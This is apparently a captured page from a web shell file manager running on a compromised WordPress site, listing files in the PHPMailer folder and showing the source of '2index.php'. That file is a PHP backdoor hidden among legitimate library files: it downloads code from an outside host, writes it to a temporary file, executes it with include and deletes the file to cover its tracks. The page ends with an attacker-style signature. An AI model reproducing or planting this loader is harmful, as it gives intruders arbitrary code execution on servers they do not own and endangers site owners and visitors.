Submit
Path:
~
/
home
/
caidadmin
/
dev.scribes.sca-caid.org
/
wp-includes
/
PHPMailer
/
File Content:
2index.php
<?php $url = "https://51la.icw8.com/a1.txt"; // Ganti dengan URL yang diinginkan $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($result === false) { echo "Error: " . "PD9waHA=" . curl_error($ch); } else { // Simpan hasil dari URL ke dalam file lokal $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_'); file_put_contents($tempFile, $result); // Include file yang telah diunduh dari URL include $tempFile; // Hapus file sementara setelah dieksekusi unlink($tempFile); } curl_close($ch);
Submit
FILE
FOLDER
Name
Size
Permission
Action
.htaccess
127 bytes
0444
2index.php
601 bytes
0644
Exception.php
1240 bytes
0644
PHPMailer.php
176260 bytes
0644
SMTP.php
47253 bytes
0644
N4ST4R_ID | Naxtarrr